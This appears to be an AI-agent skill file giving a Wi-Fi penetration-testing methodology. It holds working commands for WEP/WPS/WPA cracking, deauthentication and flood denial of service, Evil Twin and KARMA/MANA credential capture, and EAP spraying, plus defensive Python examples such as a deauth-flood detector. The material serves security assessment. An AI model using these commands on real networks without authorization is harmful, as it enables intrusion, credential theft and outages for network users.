Hacktricks-skills wifi-pentest

Wi-Fi security testing and penetration testing. Use this skill whenever the user mentions Wi-Fi attacks, wireless security testing, WEP/WPA/WPS cracking, Evil Twin attacks, deauthentication, handshake capture, PMKID attacks, WPA Enterprise testing, KARMA/MANA attacks, or any wireless network assessment. This skill covers reconnaissance, attack execution, and credential capture for Wi-Fi networks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/generic-methodologies-and-resources/pentesting-wifi/pentesting-wifi/SKILL.MD
source content

Wi-Fi Pentesting Skill

A comprehensive skill for Wi-Fi security assessment and penetration testing. This skill guides you through wireless network reconnaissance, attack execution, and credential capture.

When to Use This Skill

Use this skill when the user asks about:

  • Wi-Fi network security testing or assessment
  • WEP, WPA, WPA2, WPA3 cracking or attacks
  • WPS (Wi-Fi Protected Setup) attacks
  • Evil Twin, KARMA, or MANA attacks
  • Deauthentication or DoS attacks on Wi-Fi
  • Handshake capture or PMKID extraction
  • WPA Enterprise (802.1X) testing
  • Wi-Fi Direct security testing
  • IoT device Wi-Fi exploitation
  • Wireless network reconnaissance

Prerequisites

Before starting any Wi-Fi pentest:

  1. Hardware: Wi-Fi adapter that supports monitor mode and packet injection
  2. OS: Kali Linux or similar penetration testing distribution
  3. Permissions: Root/sudo access required for most operations
  4. Legal: Ensure you have explicit authorization to test the target network

Quick Reference Commands

Interface Management

# List available interfaces
ip link show
iwconfig

# Kill interfering processes
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0
iwconfig wlan0 mode monitor

# Disable monitor mode (return to managed)
airmon-ng stop wlan0mon
iwconfig wlan0mon mode managed

Network Scanning

# Basic scan (2.4GHz default)
airodump-ng wlan0mon

# Scan 5GHz band
airodump-ng wlan0mon --band a

# Scan for WPS-enabled networks
airodump-ng wlan0mon --wps

# Scan with iw (alternative)
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
iwlist wlan0 scan

Attack Categories

1. Reconnaissance

Start with passive scanning to identify targets:

# Capture traffic on specific BSSID and channel
airodump-ng --bssid <BSSID> --channel <CH> --write capture wlan0mon

# Filter for WPS-enabled networks
airodump-ng wlan0mon --wps

# Identify authentication types (WPA-PSK, WPA-MGT/Enterprise)
# Look for "WPA2 CCMP MGT" in airodump output for Enterprise

2. WEP Attacks

WEP is trivially broken. Use this workflow:

# Step 1: Capture IVs
airodump-ng --bssid <BSSID> --channel <CH> --write wep_capture wlan0mon

# Step 2: Accelerate IV collection with ARP replay (optional)
# Requires a connected client MAC
aireplay-ng --arpreplay -b <BSSID> -h <CLIENT_MAC> wlan0mon

# Step 3: Crack once enough IVs collected (typically 50k+)
aircrack-ng wep_capture-01.cap

Why WEP fails: WEP prepends a 24-bit IV to the static key to form the per-frame RC4 key, so with only 2^24 possible IVs the same IV is reused quickly on a busy network. Same IV + same key = same keystream, and XORing two ciphertexts encrypted under it cancels the keystream and reveals the XOR of the plaintexts. The PTW attack reduces the requirement to tens of thousands of captured packets.
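
The keystream-reuse property described above, as an added example written for this page (not code from HackTricks or the aircrack-ng project). It implements RC4 in pure Python, encrypts two constructed frames under one IV and a constructed key, shows that c1 XOR c2 equals p1 XOR p2 without the key, and computes the birthday bound for the 24-bit IV space; all inputs are constructed in-line.

```python
"""Added example (not from the page): why a repeated WEP IV is fatal.

WEP feeds RC4 with IV || key, so two frames sent under the same IV and the
same key are encrypted with the same keystream. XORing the two ciphertexts
therefore yields the XOR of the two plaintexts, with no key knowledge.
"""
import math
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA). Weak by design; used here only to illustrate."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP-style encryption: the 3-byte IV is prepended to the shared key."""
    assert len(iv) == 3
    return xor_bytes(plaintext, rc4_keystream(iv + key, len(plaintext)))


def keystream_reuse_leak(p1: bytes, p2: bytes, iv: bytes, key: bytes) -> bytes:
    """Return c1 XOR c2; equals p1 XOR p2 when the IV (hence keystream) repeats."""
    return xor_bytes(wep_encrypt(iv, key, p1), wep_encrypt(iv, key, p2))


def recover_with_known_plaintext(c1_xor_c2: bytes, known_p1: bytes) -> bytes:
    """If one plaintext is predictable (e.g. a fixed header), the other falls out."""
    return xor_bytes(c1_xor_c2, known_p1)


def iv_birthday_bound(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Frames after which an IV collision reaches the given probability."""
    n = 2 ** iv_bits
    return math.ceil(math.sqrt(-2.0 * n * math.log(1.0 - probability)))


if __name__ == "__main__":
    key = os.urandom(13)            # constructed 104-bit WEP key; never revealed
    iv = b"\x01\x02\x03"            # an IV the AP happens to reuse
    p1 = b"AAAAAAAAAAAAAAAA"        # constructed frame with predictable content
    p2 = b"secret payload!!"        # constructed frame we want to read
    leak = keystream_reuse_leak(p1, p2, iv, key)
    print(recover_with_known_plaintext(leak, p1))
    print(iv_birthday_bound())
```

The birthday bound (about 4,800 frames for a 50% chance of one IV repeat) is why IV reuse is a certainty rather than a rarity; the PTW attack mentioned above goes further and recovers the key itself from the related-key structure of IV || key.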

3. WPS Attacks

WPS uses an 8-digit PIN with only ~11,000 effective combinations.

WPS Bruteforce

# Using Reaver
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -vv

# Using Bully (faster, fewer dependencies)
bully wlan0mon -b <BSSID> -c <CHANNEL> -S -F -B -v 3

Pixie Dust Attack (Offline)

Exploits weak nonce generation in some APs:

# Reaver with Pixie Dust
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -N -vv

# Bully with Pixie Dust
bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3

# OneShot-C (no monitor mode required)
./oneshot -i wlan0 -K -b <BSSID>

Null PIN Attack

Some poorly configured APs accept an empty PIN:

reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -g 1 -vv -p ''

After obtaining the WPS PIN: the PIN reveals the WPA/WPA2 PSK, granting persistent network access.

4. WPA/WPA2 PSK Attacks

PMKID Attack (Clientless)

Capture the PMKID from the AP without needing connected clients:

# Install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool && make && make install

# Capture PMKID
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1

# Alternative with eaphammer
./eaphammer --pmkid --interface wlan0 --channel <CH> --bssid <BSSID>

# Convert to hashcat format
hcxpcaptool -z hashes.txt /tmp/attack.pcapng

# Crack with hashcat
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt

# Or with John the Ripper
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

A valid PMKID hash line has four fields separated by '*' (PMKID, AP MAC, client MAC, ESSID as hex), e.g.,

4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838
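
A validator for that hash-line format, added here as an example (not code from HackTricks, hashcat or hcxtools). It splits a line into the four '*'-separated fields used by hashcat -m 16800, checks each field's length and hex alphabet, decodes the ESSID, and reports malformed lines with a field-specific message so a broken conversion is caught before cracking time is spent. The sample line is the one above; the malformed line is constructed by stripping its separators.

```python
"""Added example (not from the page): validate hashcat -m 16800 PMKID lines.

Format: PMKID(16 bytes) * AP MAC(6 bytes) * client MAC(6 bytes) * ESSID(hex, <=32 bytes)
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

HEX = re.compile(r"^[0-9a-fA-F]+$")
SAMPLE_LINE = ("4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7"
               "*566f6461666f6e65436f6e6e6563743034383131343838")


@dataclass
class PmkidLine:
    pmkid: str        # 32 hex chars, lower-case
    ap_mac: str       # aa:bb:cc:dd:ee:ff
    client_mac: str
    essid: str        # decoded ESSID


def _mac(hexstr: str) -> str:
    return ":".join(hexstr[i:i + 2] for i in range(0, 12, 2)).lower()


def parse_pmkid_line(line: str) -> PmkidLine:
    """Parse and validate one line; raises ValueError naming the bad field."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError(f"expected 4 '*'-separated fields, got {len(parts)}")
    pmkid, ap, sta, essid_hex = parts
    for name, value, want in (("pmkid", pmkid, 32), ("ap_mac", ap, 12),
                              ("client_mac", sta, 12)):
        if len(value) != want or not HEX.match(value):
            raise ValueError(f"{name}: expected {want} hex chars, got {value!r}")
    if (not essid_hex or len(essid_hex) % 2 or len(essid_hex) > 64
            or not HEX.match(essid_hex)):
        raise ValueError("essid: expected 2..64 hex chars (1..32 bytes)")
    essid = bytes.fromhex(essid_hex).decode("utf-8", "replace")
    return PmkidLine(pmkid.lower(), _mac(ap), _mac(sta), essid)


def check_hash_file(lines: Iterable[str]) -> Tuple[List[PmkidLine], List[Tuple[int, str]]]:
    """Split a hash file into parsed entries and (line_number, error) pairs."""
    good, bad = [], []
    for n, line in enumerate(lines, 1):
        if not line.strip():          # blank lines are skipped, not errors
            continue
        try:
            good.append(parse_pmkid_line(line))
        except ValueError as e:
            bad.append((n, str(e)))
    return good, bad


if __name__ == "__main__":
    # Constructed input: the page's line, the same line with separators lost, a blank
    ok, errors = check_hash_file([SAMPLE_LINE, SAMPLE_LINE.replace("*", ""), ""])
    for entry in ok:
        print(entry)
    for n, err in errors:
        print(f"line {n}: {err}")
```

Run it over hashes.txt before launching hashcat: a line that lost its separators (as happens when a hash is copied through a document) fails the field-count check rather than silently being rejected by the cracker.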

Handshake Capture

Traditional method requiring a connected client:

# Step 1: Monitor target network
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w /tmp/psk --output-format pcap

# Step 2: Force reconnection with deauth
aireplay-ng -0 0 -a <BSSID> -c <CLIENT_MAC> wlan0mon
# Or broadcast deauth (may not work)
# aireplay-ng -0 0 -a <BSSID> wlan0mon

# Step 3: Verify handshake captured
# Look for "WPA Handshake" in airodump-ng output

# Step 4: Crack
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> /tmp/psk*.cap

Verify Handshake in Capture

# aircrack-ng
aircrack-ng psk-01.cap

# tshark
tshark -r psk-01.cap -n -Y eapol

# cowpatty
cowpatty -r psk-01.cap -s "ESSID" -f -

# pyrit
pyrit -r psk-01.cap analyze

5. WPA Enterprise (802.1X) Attacks

Enterprise networks use RADIUS authentication with various EAP methods.

Username Capture

EAP-Identity messages often contain usernames in cleartext:

# Capture EAP traffic
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID>

# In another terminal, capture EAPOL frames with tcpdump and open the file in Wireshark
tcpdump -i wlan0mon -w eap_capture.pcap eapol

# Filter in Wireshark: eap.code == 2 && eap.type == 1
# Look for "Response, Identity" packets

EAP Bruteforce (Password Spray)

# Using air-hammer
./air-hammer.py -i wlan0 -e <ESSID> -P <PASSWORD> -u usernames.txt

# Using eaphammer
./eaphammer --eap-spray \
    --interface-pool wlan0 wlan1 wlan2 \
    --essid <ESSID> \
    --password <PASSWORD> \
    --user-list users.txt

SIM-based EAP (IMSI Leakage)

EAP-SIM/EAP-AKA can leak IMSI in cleartext:

# Enable monitor mode
airmon-ng start wlan0

# Capture EAP frames
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# Filter: eap.code == 2 && eap.type == 1
# Look for NAI format: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
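
The two captures above (enterprise usernames and EAP-SIM/EAP-AKA IMSIs) both come down to reading EAP Response/Identity frames. The following is an added example, not code from HackTricks or any of the tools on this page: an audit script that takes EAPOL payloads (it assumes the 802.11 and LLC/SNAP headers have already been stripped, as when frames are exported from a capture), extracts the identity from Response/Identity frames, and classifies it as an anonymous outer identity, a cleartext username, or an IMSI-format NAI. The sample frames are constructed; the IMSI value follows the NAI pattern shown above but is made up.

```python
"""Added example (not from the page): find identities leaked in EAP Response/Identity.

EAPOL header: version(1) type(1) length(2); type 0 = EAP-Packet.
EAP header:   code(1) id(1) length(2) type(1) data...; code 2 = Response, type 1 = Identity.
"""
import re
from typing import List, Optional, Tuple

EAPOL_EAP_PACKET = 0
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1

# 3GPP NAI realm used by EAP-SIM/EAP-AKA; the local part is the 15-digit IMSI,
# optionally preceded by a one-digit method prefix.
IMSI_NAI = re.compile(r"^\d{15,16}@wlan\.mnc\d{3}\.mcc\d{3}\.3gppnetwork\.org$")


def build_identity_response(identity: str, eap_id: int = 1) -> bytes:
    """Constructed EAPOL(EAP-Packet) carrying an EAP Response/Identity, for the sample."""
    payload = bytes([EAP_TYPE_IDENTITY]) + identity.encode()
    eap = bytes([EAP_CODE_RESPONSE, eap_id]) + (4 + len(payload)).to_bytes(2, "big") + payload
    return bytes([0x01, EAPOL_EAP_PACKET]) + len(eap).to_bytes(2, "big") + eap


def extract_identity(eapol: bytes) -> Optional[str]:
    """Return the identity if the frame is an EAP Response/Identity, else None."""
    if len(eapol) < 4 or eapol[1] != EAPOL_EAP_PACKET:
        return None
    body_len = int.from_bytes(eapol[2:4], "big")
    eap = eapol[4:4 + body_len]
    if len(eap) < 5 or eap[0] != EAP_CODE_RESPONSE or eap[4] != EAP_TYPE_IDENTITY:
        return None
    eap_len = int.from_bytes(eap[2:4], "big")
    if eap_len < 5 or eap_len > len(eap):
        return None
    return eap[5:eap_len].decode("utf-8", "replace")


def classify_identity(identity: str) -> str:
    """anonymous: outer identity hides the user (the desired state);
    imsi_leak: permanent SIM identity sent in the clear;
    username: a real account name sent in the clear."""
    if IMSI_NAI.match(identity):
        return "imsi_leak"
    local = identity.split("@", 1)[0]
    if local == "" or local.lower().startswith("anonymous"):
        return "anonymous"
    return "username"


def audit_identities(frames) -> List[Tuple[str, str]]:
    """frames: iterable of EAPOL payloads. Returns (identity, classification) pairs."""
    results = []
    for frame in frames:
        identity = extract_identity(frame)
        if identity is not None:
            results.append((identity, classify_identity(identity)))
    return results


def sample_frames() -> List[bytes]:
    """Constructed traffic: EAPOL-Start, Request/Identity, and three responses."""
    eapol_start = bytes([0x01, 0x01, 0x00, 0x00])
    request_identity = bytes([0x01, 0x00, 0x00, 0x05, 0x01, 0x01, 0x00, 0x05, 0x01])
    return [
        eapol_start,
        request_identity,
        build_identity_response("anonymous@example.org"),
        build_identity_response("CORP\\jdoe"),
        build_identity_response("208150123456789@wlan.mnc015.mcc208.3gppnetwork.org"),
    ]


if __name__ == "__main__":
    for identity, verdict in audit_identities(sample_frames()):
        print(f"{verdict:10s} {identity}")
```

Anything classified as username or imsi_leak is a finding: clients should send an anonymous outer identity and keep the real one inside the TLS tunnel (EAP-TTLS/PEAP) or use pseudonyms (EAP-SIM/AKA).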

6. Evil Twin Attacks

Evil Twin exploits client preference for stronger signals and known networks.

Open Evil Twin

# Basic with airbase-ng
airbase-ng -a <FAKE_MAC> --essid "<TARGET_ESSID>" -c <CHANNEL> wlan0mon

# With eaphammer (interface NOT in monitor mode)
./eaphammer -i wlan0 --essid <ESSID> --captive-portal

WPA/WPA2 Evil Twin

Requires knowing the password:

./eaphammer -i wlan0 -e <ESSID> -c <CHANNEL> --creds --auth wpa-psk --wpa-passphrase "<PASSWORD>"

Enterprise Evil Twin

# Generate certificates
./eaphammer --cert-wizard

# Launch attack
./eaphammer -i wlan0 --channel <CH> --auth wpa-eap --essid <ESSID> --creds

# With downgrade attacks
./eaphammer --negotiate gtc-downgrade
# or
./eaphammer --negotiate weakest

Authentication method priority (default): GTC, MSCHAPV2, TTLS-MSCHAPV2, TTLS, TTLS-CHAP, TTLS-PAP, TTLS-MSCHAP, MD5

7. KARMA, MANA, Known Beacon Attacks

KARMA Attack

Responds to all probe requests:

./eaphammer -i wlan0 --cloaking full --captive-portal

MANA Attack

Learns each client's PNL (preferred network list) from directed probes and responds to broadcast probes:

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal]

Loud MANA

Broadcasts all observed SSIDs to increase hit rate:

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal]

Known Beacon Attack

Cycles through wordlist of SSIDs:

./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txt

Known Beacon Burst

Rapid-fire beacon transmission:

./forge-beacons -i wlan0 \
    --bssid de:ad:be:ef:13:37 \
    --known-essids-file known-s.txt \
    --dst-addr 11:22:33:11:22:33 \
    --burst-count 5

8. DoS Attacks

Deauthentication

# aireplay-ng
aireplay-ng -0 <COUNT> -a <BSSID> -c <CLIENT_MAC> wlan0mon
# -0 0 = continuous deauth
# Omit -c for broadcast deauth

# mdk4
mdk4 wlan0mon d -c <CHANNEL> -b <CLIENT_MAC> -E <ESSID> -B <BSSID>
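
The defender's counterpart to the deauthentication commands above, added here as an example (not code from HackTricks, aircrack-ng or mdk4): a minimal flood detector of the kind a wireless IDS runs. It parses raw 802.11 management frame headers (assumed to have the radiotap header already removed) and raises an alert when one transmitter address sends more than a threshold of deauth/disassoc frames within a short window. THRESHOLD and WINDOW_S are assumed tuning values; the capture is constructed in-line.

```python
"""Added example (not from the page): detect deauth/disassoc floods in monitor-mode captures.

802.11 management frame: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2) body.
For deauth (subtype 12) and disassoc (subtype 10) the body starts with a 2-byte reason code.
"""
from collections import defaultdict, deque
from typing import Dict, List, Optional, Tuple

BROADCAST = "ff:ff:ff:ff:ff:ff"
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
THRESHOLD = 10      # frames per window per transmitter (assumed tuning value)
WINDOW_S = 1.0      # sliding window in seconds (assumed tuning value)


def _mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, seq: int,
                     reason: int = 7) -> bytes:
    """Constructed deauth/disassoc frame used only as detector test input.
    Reason 7 = 'class 3 frame received from non-associated STA'."""
    fc = bytes([(subtype << 4) | 0x00, 0x00])        # type 0 (management), no flags
    duration = b"\x3a\x01"
    seq_ctrl = (seq << 4).to_bytes(2, "little")      # fragment 0, sequence number seq
    return (fc + duration + _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid)
            + seq_ctrl + reason.to_bytes(2, "little"))


def parse_mgmt_frame(frame: bytes) -> Optional[Dict]:
    """Return a dict for deauth/disassoc frames, None for anything else."""
    if len(frame) < 26:
        return None
    ftype = (frame[0] >> 2) & 0x3
    subtype = (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    return {
        "subtype": subtype,
        "dst": _mac_str(frame[4:10]),
        "src": _mac_str(frame[10:16]),
        "bssid": _mac_str(frame[16:22]),
        "seq": int.from_bytes(frame[22:24], "little") >> 4,
        "reason": int.from_bytes(frame[24:26], "little"),
    }


def detect_deauth_flood(frames: List[Tuple[float, bytes]], threshold: int = THRESHOLD,
                        window_s: float = WINDOW_S) -> List[Dict]:
    """frames: (timestamp, raw_frame) in time order. One alert per offending transmitter."""
    recent = defaultdict(deque)
    alerts: Dict[str, Dict] = {}
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if info is None:
            continue
        q = recent[info["src"]]
        q.append((ts, info))
        while q and ts - q[0][0] > window_s:   # drop frames outside the window
            q.popleft()
        if len(q) > threshold:                 # keep the latest (largest) count
            alerts[info["src"]] = {
                "src": info["src"],
                "count": len(q),
                "broadcast": any(i["dst"] == BROADCAST for _, i in q),
                "reasons": sorted({i["reason"] for _, i in q}),
                "first_ts": q[0][0],
                "last_ts": ts,
            }
    return list(alerts.values())


def sample_capture() -> List[Tuple[float, bytes]]:
    """Constructed capture: two legitimate AP-originated frames and a spoofed burst."""
    ap, client = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
    frames = [(0.0, build_mgmt_frame(SUBTYPE_DEAUTH, client, ap, ap, 1, reason=3))]
    for i in range(40):   # 40 broadcast deauths claiming the AP's address in 0.5 s
        frames.append((5.0 + i * 0.0125,
                       build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap, ap, 100 + i)))
    frames.append((30.0, build_mgmt_frame(SUBTYPE_DISASSOC, client, ap, ap, 200, reason=8)))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

Because injected frames claim the AP's own address, the alert keys on the transmitter field rather than trusting it; a real deployment would add sequence-number discontinuity checks and, on networks with PMF (802.11w), treat any unprotected deauth as suspicious.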

Beacon Flooding (mdk4)

Creates fake APs and may crash scanners:

mdk4 wlan0mon b -a -w nta -m
# -a = non-printable chars, break 32-byte limit
# -w n = Open, t = WPA/TKIP, a = WPA2/AES
# -m = use real BSSIDs

Authentication DoS (mdk4)

Overloads AP with auth frames:

mdk4 wlan0mon a -a <BSSID> -m
# or capture and repeat from authenticated clients
mdk4 wlan0mon a -i <BSSID> -m

TKIP Michael Countermeasures (mdk4)

Triggers 1-minute AP shutdown on TKIP APs:

mdk4 wlan0mon m -t <BSSID> [-j]
# -j = intelligent replay

EAPOL Flooding (mdk4)

Creates fake sessions or disconnects clients:

mdk4 wlan0mon e -t <BSSID> [-l]
# -l = use Logoff messages to kick clients

9. Wi-Fi Direct Attacks

EvilDirect Hijacking

Impersonate the Wi-Fi Direct group owner:

airbase-ng -a <FAKE_MAC> --essid <DIRECT_ESSID> -c <CHANNEL> wlan0mon

10. IoT Pivoting (Shelly Gen4 Example)

Some IoT devices keep their commissioning AP active:

# 1. Connect to provisioning AP (e.g., Shelly-XXXX)
# 2. Access HTTP API
http://192.168.33.1/relay/0?turn=on

# 3. Pivot to internal network via device
# Use Shelly scripting to make HTTP requests from internal interface
Shelly.addEventHandler(function (event) {
    if (event.component === "switch:0" && event.info.state) {
        Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
    }
});

Tools Installation

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

Airgeddon

# Install dependencies
mv $(which dhcpd) $(which dhcpd).old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

# Run with Docker (alternative)
docker run --rm -ti --name airgeddon --net=host --privileged \
    -p 3000:3000 -v /tmp:/io \
    -e DISPLAY=$(env | grep DISPLAY | awk -F '=' '{print $2}') \
    v1s1t0r1sh3r3/airgeddon

Wifiphisher

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Wifite2

Automates WPS/WEP/WPA-PSK attacks:

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install

# Run
sudo wifite2 --interface wlan0mon

Best Practices

  1. Always verify authorization before testing any network
  2. Document findings including BSSID, channel, encryption type, vulnerabilities
  3. Use wordlists like rockyou.txt for password cracking
  4. Combine attacks - deauth + handshake capture, MANA + captive portal
  5. Test multiple methods - PMKID may work when handshake capture fails
  6. Consider PMF/802.11w - WPA3 networks may block spoofed deauth frames
  7. Check for client isolation on open/OWE networks before assuming L2 access

Common Issues

  • Monitor mode fails: Some adapters don't support it. Try different hardware.
  • Deauth not working: Target may have PMF/802.11w enabled (WPA3).
  • Handshake not capturing: May need to wait for client to reconnect, or use PMKID instead.
  • WPS timeout: AP may block MAC addresses. Use MAC rotation or try Pixie Dust.
  • Evil Twin not connecting: Client may prefer stronger signal or validate certificates.
